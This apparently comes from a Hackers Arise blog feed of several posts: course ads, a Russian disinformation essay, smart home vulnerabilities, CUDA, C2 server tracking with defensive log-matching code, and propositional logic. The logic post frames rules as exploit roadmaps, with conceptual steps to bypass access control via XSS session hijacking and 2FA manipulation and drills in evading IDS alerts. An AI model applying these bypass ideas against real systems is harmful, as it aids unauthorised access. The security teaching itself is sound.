
Smart Home Hacking, January 13-15

By: OTW
25 November 2025 at 11:39

Welcome back, my aspiring cyberwarriors!

Smart homes are becoming increasingly common in our digital world! These smart home devices have become one of the key targets of malicious hackers. This is largely due to their very weak security. In 2025, attacks on connected devices rose 400 percent, with average breach costs hitting $5.4 million.

In this three-day class, we will explore and analyze the various security weaknesses of these smart home devices and protocols.

Course Outline

  1. Introduction and Overview of Smart Home Devices
  2. Weak Authentication on Smart Home Devices
  3. RFID and the Smart Home Security
  4. Bluetooth and Bluetooth LE vulnerabilities in the home
  5. Wi-Fi vulnerabilities and how they can be leveraged to take over all the devices in the home
  6. LoRa vulnerabilities
  7. IP Camera vulnerabilities
  8. Zigbee vulnerabilities
  9. Jamming Wireless Technologies in the Smart Home
  10. How attackers can pivot from an IoT device in the home to take over your phone or computer
  11. How to Secure Your Smart Home

This course is part of our Subscriber Pro training package

Unraveling the Web of Russian Disinformation Campaigns

By: OTW
24 November 2025 at 23:30

Introduction:

Hello world of Hackers Arise, in this post, we delve into the complex world of Russian disinformation campaigns on the internet. As Master OTW clearly established in his interview with Yaniv Hoffman (watch the video below), the disinformation campaign carried out by the high-ranking Russian authorities is not something new. It has been developed for decades, and they have truly become extremely adept at it, especially now with the use of the internet and social media. Throughout the years, they have dedicated themselves to spreading hatred, envy, and resentment worldwide, which we could classify as Psychological Warfare Operations, but taken to the extreme, as they not only aim to misinform or influence to achieve specific strategic targets but also intend to divide and confront the entire world.

However, we do not say this capriciously; there are foundations and information that support our arguments. We also do not intend to hide or minimize the fact that all nation-states carry out this type of operation, but in the case of the Russian authorities, their intention redefines the concept of pure malevolence.

https://www.youtube.com/watch?v=t2P6iADGnpE

With the rise of social media and interconnected platforms, information dissemination has become a powerful tool for shaping public opinion. Russia, among other countries, has been at the forefront of exploiting these channels to advance its strategic goals. This article aims to shed light on the methods, motives, and implications of Russia’s disinformation campaigns while underlining the importance of critical thinking and media literacy in navigating the digital landscape.

 

Understanding Disinformation:

Disinformation is the dissemination of false or misleading information with the intention to deceive or manipulate the public. Russia has become notorious for employing sophisticated techniques to influence global narratives on a wide range of issues, from political events to social debates and international relations. Understanding the multifaceted nature of disinformation is crucial in recognizing and countering its effects.

The following link leads to a study whose key points I will list below with the aim of understanding the main characteristics of this type of operation carried out by the Russian authorities.

  – Russian Propaganda Is High-Volume and Multichannel
  – Russian Propaganda Is Rapid, Continuous, and Repetitive
  – Russian Propaganda Makes No Commitment to Objective Reality
  – Russian Propaganda Is Not Committed to Consistency

Methods Used:

Russia employs an array of methods to propagate disinformation effectively. These include the use of bots and troll farms to flood social media with false narratives, the creation and distribution of deceptive content, and the manipulation of search engine algorithms to amplify biased information. By utilizing these methods, Russia can create an illusion of consensus and spread narratives that align with its geopolitical interests.

“The Russian Federation has engaged in a systematic, international campaign of disinformation, information manipulation and distortion of facts in order to enhance its strategy of destabilisation of its neighbouring countries, the EU and its member states. In particular, disinformation and information manipulation has repeatedly and consistently targeted European political parties, especially during the election periods, civil society and Russian gender and ethnic minorities, asylum seekers and the functioning of democratic institutions in the EU and its member states.

In order to justify and support its military aggression of Ukraine, the Russian Federation has engaged in continuous and concerted disinformation and information manipulation actions targeted at the EU and neighbouring civil society members, gravely distorting and manipulating facts.” Source (Picture below)

 The mass media outlets mentioned above are either state-owned or corporations serving the state. However, Putin does not like independent journalism doing its job, and that’s why he took actions against them. Source Take a look at the amount of budget allocated by the Russian high command for those platforms to deploy disinformation.  

Motives Behind the Campaigns:

The motives driving Russia’s disinformation campaigns are diverse and can be linked to political, economic, and security-related goals. Destabilizing rival countries, sowing discord among allies, discrediting political opponents, and undermining democratic processes are some of the key objectives pursued through these campaigns. Understanding these motives is essential in formulating an effective response. If you still don’t believe that they spread hate all over the internet, take a look at these myths whose explanations are debunked in the source we provided.

  And what about the Russian troll farm?  

Implications and Impact:

The impact of Russian disinformation campaigns is far-reaching. They can polarize societies, erode trust in democratic institutions, and exacerbate existing divisions within nations. In international affairs, disinformation can escalate tensions between countries and influence public opinion on foreign policy matters. Moreover, the erosion of trust in media sources can lead to a decline in accurate information and the rise of echo chambers. Russian officials and pro-Russian media capitalized on the fear and uncertainty caused by the COVID-19 pandemic, actively spreading conspiracy theories. Among these theories, they focused on false U.S. bio-weapon infrastructure claims. One notable example is an article published by New Eastern Outlook on 20th February, available in both Russian and English, alleging that the U.S. deployed a biological weapon against China.

  

Fighting Back:

Countering Russian disinformation requires a comprehensive approach. Governments, tech companies, and civil society must collaborate to identify and expose false narratives, invest in media literacy programs, and enhance cybersecurity measures to protect against information warfare. Educating the public on critical thinking and fact-checking is a powerful tool in combating the spread of disinformation, but it is also our responsibility as hackers and advocates of freedom within the cyberspace; we must make this responsibility our mission, our duty, to ensure free access to information.

 

Conclusion:

The internet has opened up new frontiers for information dissemination, but it has also become fertile ground for disinformation campaigns. Russia’s approach to shaping narratives on a global scale requires a vigilant and proactive response from the international community. By fostering media literacy and promoting responsible online behavior, we can safeguard the integrity of information and fortify our societies against the perils of disinformation.

Smouk out!

 

Smart Home Hacking: Getting Started

By: OTW
18 November 2025 at 13:25

Welcome back, my aspiring cyberwarriors!

As smart homes become ever more common in our digital world, they have become a favorite target for hackers around the world. We have seen SO many smart home devices compromised and then the hackers use those devices to pivot to other devices connected to the local area network such as phones and laptops.

Smart home devices now include so many devices, such as:

  1. Smart TVs
  2. Smart Lighting
  3. Smart Garage Door Openers
  4. Smart Security Systems
  5. Smart Cameras
  6. Smart Appliances (Refrigerators, stoves, washers, dryers, etc.)
  7. Smart Picture Frames
  8. Smart Infotainment Systems
  9. and so many more

Each of these smart devices has a small CPU, a small amount of RAM, and a Linux operating system, most commonly BusyBox, due to its very small size. These systems are very often shipped with little forethought regarding security. This makes it relatively easy to hack these devices.

In addition, these devices are often connected to your Wi-Fi, Bluetooth, or Zigbee network. Each of these network types is vulnerable to multiple attack vectors, making the entire home and the devices therein vulnerable.

To learn more about Smart Home Hacking, consider attending our Smart Home Hacking training, January 13-15.

Here are the most significant security risks documented in recent research and threat reports:

Common Smart Home Vulnerabilities

  • Weak or Default Credentials
    • Many smart home devices ship with weak, default, or hardcoded passwords, which attackers can easily guess or find online.
    • Credential stuffing and password reuse across multiple devices leads to widespread compromise.
  • Outdated and Unpatched Firmware
    • A high proportion of smart devices run old firmware with known vulnerabilities and rarely receive updates or security patches, leaving them open to exploitation.
    • Supply chain vulnerabilities can introduce malware before devices even reach the consumer (such as Badbox 2.0).
  • Vulnerable Network Services and Open Ports
    • Devices expose unnecessary or insecure services to the local network or internet (e.g., Telnet, UPnP, poorly secured web interfaces), facilitating remote exploitation.
    • Automated scanning for open ports is a dominant attack method, accounting for over 93% of blocked events in recent studies.
  • Poor Encryption and Data Protection
    • Many smart devices transmit sensitive data (e.g., audio, video, sensor readings) without proper encryption, enabling eavesdropping and privacy breaches.
    • Weak or flawed cryptographic implementations allow attackers to decrypt captured traffic or manipulate device functionality.
  • Device Hijacking and Botnets
    • Attackers can take over smart devices, using them as proxies for further attacks (DDoS, ad fraud, credential theft) or as part of large-scale botnets (Mirai, EchoBot, PUMABOT).
    • Compromised devices may serve attacks on other systems without user awareness—sometimes even posing physical safety risks (e.g., hijacked locks or thermostats).
  • Privacy and Data Exposure
    • Insecure cameras, microphones, and voice assistants can be used for covert surveillance or to steal sensitive data.
    • Exposed cloud APIs and device “phone home” features can leak data to third parties or attackers.
  • Weak Access Controls
    • Poor onboarding, lack of two-factor authentication, flawed pairing mechanisms, and weak authorization checks let attackers gain access to devices or sensitive controls.

Real-World Examples (2025)

  • Smart TVs, streaming devices, and IP cameras are currently the most exploited categories, often running on Linux/Android with outdated kernels.
  • Malicious firmware (such as BadBOX) pre-installed on consumer devices has led to huge botnets and residential proxy abuse, sometimes before devices are even plugged in by the end user.
  • Large-scale privacy violations include attackers publicly streaming home camera footage due to default credentials or unpatched vulnerabilities.

Summary Table

| Vulnerability Type | Example Consequence |
|---|---|
| Default/weak credentials | Easy unauthorized access |
| Outdated firmware | Exposure to known exploits |
| Open network services | Remote code execution, botnets |
| Poor encryption | Data interception, manipulation |
| Device hijacking/botnets | DDoS, fraud, lateral movement |
| Weak access controls | Device takeover, privacy breaches |
| Privacy/data exposure | Surveillance, data theft |

Summary

Smart homes are becoming increasingly popular in industrialized countries particularly among higher income households. These smart homes offer the user convenience while offering an enticing target for hackers. If the attacker can compromise even one device within the home, then all of the devices on the home network are at risk!

To learn more about Smart Home Hacking and Security, consider attending our upcoming Smart Home Hacking training in January 2026.

What is NVIDIA’s CUDA and How is it Used in Cybersecurity?

By: OTW
17 November 2025 at 17:09

Welcome back my aspiring cyberwarriors!

You have likely heard of the company NVIDIA. Not only are they the dominant company in computer graphics adapters (if you are a gamer, you likely have one), they are now dominant in artificial intelligence as well. In recent weeks, they have become the most valuable company in the world ($5 trillion).

The two primary reasons that Nvidia has become so important to artificial intelligence are:

  1. Nvidia chips can process data in multiple threads, in some cases, thousands of threads. This makes doing complex calculations in parallel possible, making them much faster.
  2. Nvidia created a development environment named CUDA for harnessing the power of these powerful GPUs. This development environment is a favorite among artificial intelligence, data analytics, and cybersecurity professionals.

Let’s take a brief moment to examine this powerful environment.

What is CUDA?

Most computers have two main processors:

CPU (Central Processing Unit): General-purpose, executes instructions sequentially or on a small number of cores. CPUs such as those from Intel and AMD provide the flexibility to run many different applications on your computer.

GPU (Graphics Processing Unit): GPUs were originally designed to draw graphics for applications such as games and VR environments. They contain hundreds or thousands of small cores that excel at doing the same thing many times in parallel.

CUDA (Compute Unified Device Architecture) is NVIDIA’s framework that lets you take control of the GPU for general computing tasks. In other words, CUDA lets you write code that doesn’t just render graphics—it crunches numbers at massive scale. That’s why it’s a favorite for machine learning, password cracking, and scientific computing.

Why Should Hackers & Developers Care?

CUDA matters as an important tool in your cybersecurity toolkit because:

Speed: A GPU can run password hashes or machine learning models orders of magnitude faster than a CPU.

Parallelism: If you need to test millions of combinations, analyze huge datasets, or simulate workloads, CUDA gives you raw power.

Applications in Hacking: Tools like Hashcat and Pyrit use CUDA to massively accelerate brute-force and dictionary attacks. Security researchers who understand CUDA can customize or write their own GPU-accelerated tools.

The CUDA environment sees the GPU as a device with:

Threads: The smallest execution unit (like a tiny worker).

Blocks: Groups of threads.

Grids: Groups of blocks.

Think of it like this:

  • A CPU worker can cook one meal at a time.
  • A GPU is like a kitchen with thousands of cooks—we split the work (threads), organize them into brigades (blocks), and assign the whole team to the job (grid).

Coding With CUDA

CUDA extends C/C++ with some keywords.
Here’s the simple workflow:

  1. You write a kernel function (runs on the GPU).
  2. You call it from the host code (the CPU side).
  3. Launch thousands of threads in parallel → GPU executes them fast.

Example skeleton code:

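#include <cstdio>
#define N 8

// Kernel: runs on the GPU; each thread adds one pair of elements
__global__ void add(int *a, int *b, int *c) {
    int idx = threadIdx.x;
    c[idx] = a[idx] + b[idx];
}

int main() {
    int a[N], b[N], c[N], *dev_a, *dev_b, *dev_c;
    for (int i = 0; i < N; i++) { a[i] = i; b[i] = 2 * i; }
    // Allocate memory on the device (host arrays live on the stack)
    cudaMalloc(&dev_a, sizeof(a)); cudaMalloc(&dev_b, sizeof(b)); cudaMalloc(&dev_c, sizeof(c));
    // Copy data to GPU
    cudaMemcpy(dev_a, a, sizeof(a), cudaMemcpyHostToDevice);
    cudaMemcpy(dev_b, b, sizeof(b), cudaMemcpyHostToDevice);
    // Run kernel with N threads
    add<<<1, N>>>(dev_a, dev_b, dev_c);
    // Copy results back to host (this call waits for the kernel to finish)
    cudaMemcpy(c, dev_c, sizeof(c), cudaMemcpyDeviceToHost);
    for (int i = 0; i < N; i++) printf("%d + %d = %d\n", a[i], b[i], c[i]);
    cudaFree(dev_a); cudaFree(dev_b); cudaFree(dev_c);
}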

The keywords:

  • __global__ → A function (kernel) run on the GPU.
  • threadIdx → Built-in variable identifying which thread you are.
  • <<<1, N>>> → Tells CUDA to launch 1 block of N threads.

This simple example adds two arrays in parallel. Imagine scaling this to millions of operations at once!

The CUDA Toolchain Setup

If you want to try CUDA make certain you have the following items:

1. an NVIDIA GPU.

2. the CUDA Toolkit (contains compiler nvcc).

3. Write your CUDA programs in C/C++ and compile them with nvcc.

Run and watch your GPU chew through problems.

To install the CUDA toolkit in Kali Linux, simply enter;

kali > sudo apt install nvidia-cuda-toolkit

Next, write your code and compile it with nvcc, such as;

kali > nvcc hackersarise.cu -o hackersarise

Practical Applications of CUDA

CUDA is already excelling at hacking and computing applications such as;

  1. Password cracking (Hashcat, John the Ripper with GPU support).
  2. AI & ML (TensorFlow/PyTorch use CUDA under the hood). Our application of using Wi-Fi to see through walls uses CUDA.
  3. Cryptanalysis (breaking encryption) & simulation tasks.
  4. Network packet analysis at high scale.

As a beginner, start with small projects—then explore how to take compute-heavy tasks and offload them to the GPU.

Summary

CUDA is NVIDIA’s way of letting you program GPUs for general-purpose computing. To the hacker or cybersecurity pro, it’s a way to supercharge computation-heavy tasks.

Learn the thread-block-grid model, write simple kernels, and then think: what problems can I solve dramatically faster if run in parallel?


SCADA/ICS Forensics, Nov. 18-20

By: OTW
7 November 2025 at 13:33

Welcome back, my aspiring SCADA/ICS security engineers!

SCADA/ICS hacking is one of the most important areas of cybersecurity and one of the least understood. SCADA/ICS systems power our entire industrial infrastructure and are critical to the everyday functioning of our economy and lives. These systems include:

  1. Electrical generation and transmission
  2. Chemical processing
  3. Oil refineries
  4. Food processing
  5. Pharmaceutical manufacturing
  6. Water and wastewater systems
  7. Cellular and mobile communication systems

Without any of these systems, an economy can be crippled. Hackers-Arise is one of the leaders in SCADA/ICS cybersecurity, and next month we are offering a new class in this discipline, SCADA/ICS Forensics.

If we are to protect these systems, we need to understand how hackers can access these systems and how we can detect their presence and actions.

SCADA/ICS Forensics Training Outline

1. Introduction to ICS/SCADA Systems

Overview of industrial control systems (ICS) and SCADA architecture

Key components: PLCs, RTUs, sensors, actuators, HMIs, data historians

Differences between IT and OT environments

2. ICS/SCADA Protocols and Communications

Common industrial protocols (Modbus, DNP3, OPC, PROFIBUS, etc.)

TCP/IP and fieldbus network topologies

Protocol vulnerabilities and forensic implications

3. Threats, Attacks, and Incident Scenarios

ICS-specific threats (insider, supply chain, targeted malware)

Case studies: from Russia’s attacks on Ukraine’s infrastructure, Stuxnet, Industroyer, Triton, and ransomware in ICS

Attack methodologies unique to ICS/SCADA

4. ICS/SCADA Forensic Fundamentals

Principles of digital forensics in ICS/SCADA

Preservation of volatile and non-volatile evidence

Chain of custody, legal and compliance considerations

5. Evidence Collection Techniques

Safe imaging of PLCs, HMIs, and historian servers

Capturing network traffic in industrial environments

Handling physical and logical data acquisition in situ

6. Log Analysis and Event Correlation

ICS-specific log sources (controller logs, SCADA system logs)

Event timeline reconstruction and anomaly detection

Dealing with proprietary and legacy logging systems

7. Malware Analysis and Reverse Engineering in ICS

Identifying ICS-focused malware (e.g., OT ransomware, custom payloads)

Static and dynamic analysis of binaries from field devices

Artifact recovery from embedded devices and firmware

8. Network Forensics in OT/ICS Environments

Deep packet inspection of industrial protocol traffic

Identifying network-based evidence (command/response, unauthorized access)

Use of specialized tools (Wireshark with ICS dissectors, etc.)

9. Reporting and Remediation

Documentation of forensic findings for ICS/SCADA

Coordinating with OT/IT teams for incident response

Lessons learned and post-incident review practices

Summary

If your job requires you to protect SCADA/ICS systems or you simply want to add SCADA/ICS cybersecurity to your skill set, then this class is for you!

You can enjoy and benefit from all 3 of our SCADA/ICS classes in our SCADA/ICS career path here.

The post SCADA/ICS Forensics, Nov. 18-20 first appeared on Hackers Arise.

Cyber Threat Intelligence (CTI): Finding C2 Servers, Malware and Botnets

By: OTW
30 October 2025 at 11:11

Welcome back my cyberwarriors!

One of the key tasks for those defending a country’s, institution’s or corporation’s assets is to understand what threats exist. This is often referred to as Cyber Threat Intelligence or CTI. It encompasses understanding what the threat actors (hackers and nations) are doing and which are threats to your organization. In that regard, we have a new tool to identify and track command and control servers, malware and botnets using telltale fingerprinting from Shodan and Censys.

Command and Control Servers: History, Development & Tracking

In the fast-changing world of cybersecurity, Command and Control (C2) servers have been crucial. These servers are central to many cyber attacks and play a big role in the ongoing fight between offensive and defensive sides. To appreciate modern tools like C2 Tracker, let’s look back at the history and development of C2 servers.

Early days

The story of C2 servers starts in the early days of the internet, back in the 1990s. Hackers used Internet Relay Chat (IRC) channels as their first basic command centers. Infected computers would connect to these IRC channels, where attackers could send commands directly. The malware on the compromised systems would then carry out these commands.

The following figure shows the Hoaxcalls bot’s C2 communication with its C2 server over IRC.

The Web Era and the Art of Blending In

As detection methods got better, attackers changed their tactics. In the early 2000s, they started using web-based C2 systems. By using HTTP and HTTPS, attackers could hide their C2 traffic as regular web browsing. Since web traffic was everywhere, this method was a clever way to camouflage their malicious activities.

Using basic web servers to manage their command systems also made things simpler for attackers. This period marked a big step up in the sophistication of C2 methods, paving the way for even more advanced techniques.

Decentralization: The Peer-to-Peer Revolution

In the mid-2000s, C2 systems saw a major change with the rise of peer-to-peer (P2P) networks. This shift addressed the weakness of centralized servers, which were easy targets for law enforcement and defensive security teams.

In P2P C2 systems, infected computers talk to each other to spread commands and steal data. This decentralized setup made it much harder to shut down the network. Examples like the Storm botnet and later versions of the Waledac botnet showed how tough this model was to tackle, pushing cybersecurity experts to find new ways to detect and counter these threats.

Machines infected by Storm botnet:

Hiding in Plain Sight: The Social Media and Cloud Era

In the 2010s, the rise of social media and cloud services brought a new shift in C2 tactics. Cyber attackers quickly started using platforms like Twitter, Google Docs, and GitHub for their C2 operations. This made it much harder to spot malicious activity because commands could be hidden in ordinary tweets or documents. Additionally, using major cloud providers made their operations more reliable and resilient.

The Modern C2 Landscape

Today’s C2 systems use advanced evasion techniques to avoid detection. Domain fronting hides malicious traffic behind legitimate, high-reputation websites. Fast flux networks constantly change the IP addresses linked to C2 domains, making it difficult to block them. Some attackers even use steganography to hide commands in images or other harmless-looking files.

One of the latest trends is blockchain-based C2 systems, which use cryptocurrency networks for covert communication. This approach takes advantage of blockchain’s decentralized and anonymous features, creating new challenges for tracking and identifying these threats.

Blockchain transaction diagrams used by Glupteba botnet

The Rise of C2 Tracking Tools

With C2 servers being so crucial in cyber attacks, developing effective tracking tools has become really important. By mapping out how different attackers set up their C2 systems, these tools provide insights into their tactics and capabilities. This helps link attacks to specific groups and track changes in methods over time.

Additionally, this data helps with proactive threat hunting, letting security teams search for signs of C2 communication within their networks and find hidden compromises. On a larger scale, C2 tracking tools offer valuable intelligence for law enforcement and cybersecurity researchers, supporting takedown operations and the creation of new defense strategies.

C2 Tracker

C2 Tracker is a free, community-driven IOC feed that uses Shodan and Censys searches to gather IP addresses of known malware, botnets, and C2 infrastructure.

This feed is available on GitHub and is updated weekly. You can view the results here: https://github.com/montysecurity/C2-Tracker/tree/main/data

The tool tracks an extensive list of threats, including:

  • C2 Frameworks: Cobalt Strike, Metasploit, Covenant, Mythic, Brute Ratel C4, and many more.

  • Malware: A variety of stealers, RATs, and trojans such as AcidRain Stealer, Quasar RAT, ShadowPad, and DarkComet.

  • Hacking Tools: XMRig Monero Cryptominer, GoPhish, Browser Exploitation Framework (BeEF), and others.

  • Botnets: Including 7777, BlackNET, Doxerina, and Scarab.

To run it locally:

kali> git clone https://github.com/montysecurity/C2-Tracker.git

kali> cd C2-Tracker

kali> vim .env

Add your Shodan API key as the environment variable SHODAN_API_KEY, and set up your Censys credentials with CENSYS_API_ID and CENSYS_API_SECRET.

kali> python3 -m pip install -r requirements.txt

kali> python3 tracker.py

In the data directory, you can see the results:

Let’s take a look at some of the IP addresses of GoPhish servers.

Shodan shows that the default port 3333 is open.

When opened, we can see the authorization form.

Now, let’s move on to our main objective, finding command and control (C2) servers.

For instance, let’s look at the Cobalt Strike IP addresses.

We have 827 results!

Each of these IP addresses represents a Cobalt Strike C2 server.
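One way to put the feed to work for the threat hunting described earlier, as an added example that is not part of the original post or of the C2-Tracker project: index the feed's IP lists and match them against outbound connection logs. It assumes each feed file is plain text with one IP address per line; the feed labels, the log format and every address below are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from pathlib import Path

# Assumed (constructed) firewall log format: ts src= dst= dport= action=
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$"
)

# Constructed feed contents using documentation-only address ranges.
SAMPLE_FEEDS = {
    "cobalt_strike": "203.0.113.10\n203.0.113.77\n\n",
    "gophish": "198.51.100.5\n203.0.113.77\nnot-an-ip\n",
}

# Constructed log lines: two allowed hits, one denied hit, one miss, one bad line.
SAMPLE_LOG = [
    "2025-10-30T11:02:17Z src=10.0.0.23 dst=203.0.113.10 dport=443 action=allow",
    "2025-10-30T11:02:19Z src=10.0.0.23 dst=192.0.2.8 dport=443 action=allow",
    "2025-10-30T11:05:41Z src=10.0.0.40 dst=198.51.100.5 dport=3333 action=deny",
    "2025-10-30T11:07:03Z src=10.0.0.51 dst=203.0.113.77 dport=80 action=allow",
    "garbled line without fields",
]


def parse_feed(text):
    """Return the set of valid IP addresses in a one-IP-per-line feed file."""
    ips = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            ips.add(ipaddress.ip_address(line))
        except ValueError:
            continue  # skip anything that is not an IP address
    return ips


def build_index(feeds):
    """Map each IP to the feed labels that list it (an IP can be in several)."""
    index = defaultdict(set)
    for label, text in feeds.items():
        for ip in parse_feed(text):
            index[ip].add(label)
    return dict(index)


def read_feed_dir(data_dir):
    """Load every *.txt file in a local copy of the feed's data directory."""
    return {
        p.stem: p.read_text(encoding="utf-8", errors="replace")
        for p in sorted(Path(data_dir).glob("*.txt"))
    }


def hunt(log_lines, index):
    """Return one record per log line whose destination is in the feed index."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        try:
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue
        labels = index.get(dst)
        if labels:
            hits.append({
                "ts": m["ts"], "src": m["src"], "dst": str(dst),
                "dport": int(m["dport"]), "action": m["action"],
                "labels": sorted(labels),
            })
    return hits


def hosts_to_triage(hits):
    """Internal hosts whose connection to a listed IP was allowed through."""
    by_src = defaultdict(set)
    for hit in hits:
        if hit["action"] == "allow":
            by_src[hit["src"]].update(hit["labels"])
    return {src: sorted(labels) for src, labels in by_src.items()}


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG, build_index(SAMPLE_FEEDS))
    for hit in found:
        print(hit)
    print("triage:", hosts_to_triage(found))
```

Treat a hit as a lead to investigate: IP addresses get reassigned, so compare the log timestamp with the date of the feed snapshot you matched against.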

Summary

Cyber Threat Intelligence is crucial to stay ahead of the bad guys. Tools like C2 Tracker are essential to providing you a clear picture of the threat landscape. They help by spotting threats early, aiding in incident response, and supporting overall security efforts. These tools improve our ability to detect, prevent, and handle cyber threats.

The post Cyber Threat Intelligence (CTI): Finding C2 Servers, Malware and Botnets first appeared on Hackers Arise.

Logic Basics for Cybersecurity, Part 2 Propositional Logic Basics

By: OTW
27 October 2025 at 08:55

Welcome back, my aspiring cyberwarriors!

In an earlier post, I introduced you to logic. Logic is one of the most under-rated skills in cybersecurity. Without it, you are destined to fail or underperform. In this tutorial, I will attempt to advance your knowledge of logic by introducing you to propositional logic.

Propositional logic is used in AI, cybersecurity, mathematics, and data science but here we want to focus on propositional logic in cybersecurity.

Why Hackers Need Logic

Propositional logic is the backbone of cybersecurity – it’s how firewalls make decisions, how access controls work, and how attackers reverse-engineer your defenses. If you can’t think logically, you’ll get outmaneuvered. Period.

Propositional logic is a branch of logic that studies ways of combining or altering entire statements (called propositions) that have definite truth values—either true or false. It focuses on the logical relationships between these propositions and the rules for forming complex statements (compound propositions) using logical connectives like AND, OR, NOT, IF-THEN, and IF-AND-ONLY-IF.

Let’s break it down like a hacker dissecting a firewall rule.

Core Concepts: The Hacker’s Toolkit

Propositions are statements that are either true (1) or false (0):

  • P = "Port 22 is open"
  • Q = "User is admin"
  • R = "Malicious payload detected"

Logical Operators – Your Attack Vectors:

| Operator | Symbol | Real-World Example |
|---|---|---|
| NOT | ¬ | ¬P = "Port 22 is closed" |
| AND | ∧ | P ∧ Q = "Port 22 open AND user is admin" (Privilege escalation) |
| OR | ∨ | P ∨ R = "Port 22 open OR malware detected" (Alert condition) |
| IMPLIES | → | Q → R = "If user is admin, THEN check for malware" (Access policy) |
| IFF | ↔ | P ↔ Q = "Port 22 open IFF user is admin" (Hardened SSH rule) |

Truth Tables: Your Exploit Blueprint

Every firewall rule, IDS signature, or access policy boils down to truth tables. Here’s how to weaponize them:

Example: Phishing Detection Rule


(User_clicks_link ∧ Untrusted_domain) → Alert

| User_clicks_link | Untrusted_domain | Alert |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 0 |
| 1 | 0 | 0 |
| 1 | 1 | 1 |

Attack insight: Evade detection by making either condition false (e.g., hijack trusted domain).

Cybersecurity Applications: Logic in Action

1. Firewall Rule Analysis

Corporate firewall rule:
(IP ∈ whitelist ∧ Port ≠ 22) ∨ (MFA_verified)

Hacker’s playbook:

  • If MFA_verified = 0, focus on IP ∉ whitelist OR Port = 22
  • Bruteforce port 22 if IP spoofing succeeds

2. Malware Trigger Conditions

Ransomware activation logic:
(Files_encrypted ∧ Time_delay_expired) → Deploy_payload

Reverse-engineering:

  • If Files_encrypted = 0, payload won’t deploy → disrupt encryption process
  • If Time_delay_expired = 0, buy time for remediation

3. Access Control Bypass

Admin panel access rule:
(Role = "admin" ∨ (Session_hijacked ∧ ¬2FA_enabled))

Exploit path:

  1. Set Session_hijacked = 1 (via XSS)
  2. Force 2FA_enabled = 0 (via config manipulation)
  3. Access granted without admin role!

Hacker’s Lab: Practical Logic Drills

Exercise 1:
Rule: (Geolocation = "US" ∧ ¬Tor_connection) → Allow_access
Your mission: Bypass without VPN.
Hint: What combination makes Allow_access = 1?

Exercise 2:
IDS alert condition:
(SQL_keywords ∧ HTTP_request) ∧ ¬Whitelisted_IP
Evasion strategy: Make one input false to kill the alert.

Exercise 3:
Build a truth table for:
Alert_if = (Bruteforce_attempts > 5) ∧ ¬(IP ∈ whitelist)
Identify which conditions trigger alerts.

Pro Tips for Cyber Operators

  1. Policy Auditing:
    Convert ACLs to logic formulas. Hunt for contradictions like (A ∧ ¬A) – guaranteed misconfiguration!
  2. Attack Surface Mapping:
    Write threat models as logical expressions:
    Data_breach_possible = (Vulnerability_exists ∧ Exploit_available) ∧ ¬Detection
  3. SOC Automation:
    Code SIEM rules with propositional logic:
        if (unusual_login_location and not mfa_used) or (impossible_travel):
            trigger_alert()
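Policy auditing as described in tip 1, shown as an added example (not code from the original post): a truth-table enumerator that classifies a rule as a contradiction, tautology or contingent rule, lists the input combinations that satisfy it, and flags inputs that never change the outcome. It is run on the corporate firewall rule and the Exercise 3 alert condition from above; the variable names and the helpers `audit`, `allowed_without` and `silent_rows` are assumptions made for illustration.

```python
from itertools import product


def truth_table(variables, rule):
    """Evaluate `rule` for every True/False combination of `variables`."""
    rows = []
    for values in product([False, True], repeat=len(variables)):
        env = dict(zip(variables, values))
        rows.append((env, bool(rule(**env))))
    return rows


def audit(variables, rule):
    """Classify a rule and report satisfying rows and inputs that never matter."""
    rows = truth_table(variables, rule)
    satisfying = [env for env, result in rows if result]
    if not satisfying:
        verdict = "contradiction"      # rule can never fire: misconfiguration
    elif len(satisfying) == len(rows):
        verdict = "tautology"          # rule always fires: it filters nothing
    else:
        verdict = "contingent"
    # An input is "dead" if flipping it never changes the result in any row.
    dead = [
        v for v in variables
        if all(bool(rule(**{**env, v: False})) == bool(rule(**{**env, v: True}))
               for env, _ in rows)
    ]
    return {"verdict": verdict, "satisfying": satisfying, "dead_inputs": dead}


def allowed_without(variables, rule, control):
    """Rows where the rule is satisfied although `control` is False."""
    return [env for env in audit(variables, rule)["satisfying"] if not env[control]]


def silent_rows(variables, rule, condition):
    """Rows where `condition` is True but the rule stays False (detection gaps)."""
    return [env for env, result in truth_table(variables, rule)
            if env[condition] and not result]


# (IP in whitelist AND Port != 22) OR MFA_verified, with assumed variable names.
FIREWALL_VARS = ["ip_whitelisted", "port_is_22", "mfa_verified"]


def firewall_rule(ip_whitelisted, port_is_22, mfa_verified):
    return (ip_whitelisted and not port_is_22) or mfa_verified


# Alert_if = (Bruteforce_attempts > 5) AND NOT (IP in whitelist)
ALERT_VARS = ["bruteforce_over_5", "ip_whitelisted"]


def alert_rule(bruteforce_over_5, ip_whitelisted):
    return bruteforce_over_5 and not ip_whitelisted


if __name__ == "__main__":
    report = audit(FIREWALL_VARS, firewall_rule)
    print("firewall rule:", report["verdict"], "-", len(report["satisfying"]), "allowing rows")
    print("allowed without MFA:", allowed_without(FIREWALL_VARS, firewall_rule, "mfa_verified"))
    print("brute force that never alerts:",
          silent_rows(ALERT_VARS, alert_rule, "bruteforce_over_5"))
    print("A and not A:", audit(["a"], lambda a: a and not a)["verdict"])
    print("redundant clause:", audit(["a", "b"], lambda a, b: (a and b) or a)["dead_inputs"])
```

The `silent_rows` output is the row a rule review should question: a whitelisted address can exceed the brute-force threshold without raising an alert.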

The Bottom Line

Propositional logic turns vague security policies into hackable equations. Master truth tables, operator precedence, and real-world mappings – then weaponize them to expose flaws or harden systems.

Remember: In cybersecurity, logic isn’t philosophy – it’s your exploit roadmap.

“The difference between a script kiddie and a pro? The pro knows WHY the rule failed.”


Challenge: Take any firewall rule from your network. Convert it to propositional logic. Find one combination that breaks it. Report back.

The post Logic Basics for Cybersecurity, Part 2 Propositional Logic Basics first appeared on Hackers Arise.

How to Find an Entry-Level Job in Cybersecurity

By: OTW
2 October 2025 at 14:21

Welcome back, my aspiring cyberwarriors!

